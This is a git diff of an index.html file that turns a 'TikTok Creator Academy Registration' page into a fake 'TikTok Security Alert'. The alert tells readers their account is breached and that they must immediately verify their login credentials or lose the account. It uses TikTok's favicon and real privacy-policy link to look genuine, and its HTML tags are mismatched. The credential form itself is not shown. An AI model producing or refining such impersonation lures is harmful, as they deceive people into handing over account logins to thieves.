--- a/index.html
+++ b/index.html
@@ -2,13 +2,13 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>TikTok Creator Academy Registration</title>
+    <title>TikTok Security Alert</title>
     <link rel="stylesheet" href="styles.css">
 </head>
 <body>
     <div class="container">
         <img src="https://www.tiktok.com/favicon.ico" alt="TikTok Creator Academy Logo" class="logo">
-        <h1>TikTok Security Alert </h1>
+                <h1>TikTok Security Alert </h1>
         </h1>Urgent Action Required:**</h1> 
     </p>TikTok has identified a potential security breach on your account. To protect your personal information and prevent unauthorized access, you must immediately verify your login credentials. Please complete the verification process below. Failure to act promptly may lead to permanent account loss and data compromise. This is a critical and time-sensitive matter. </p>
         <p class="privacy-notice">By submitting, you consent to our <a href="https://www.tiktok.com/legal/page/global/privacy-policy/en" target="_blank">Privacy Policy</a>, including IP address and data collection.</p>
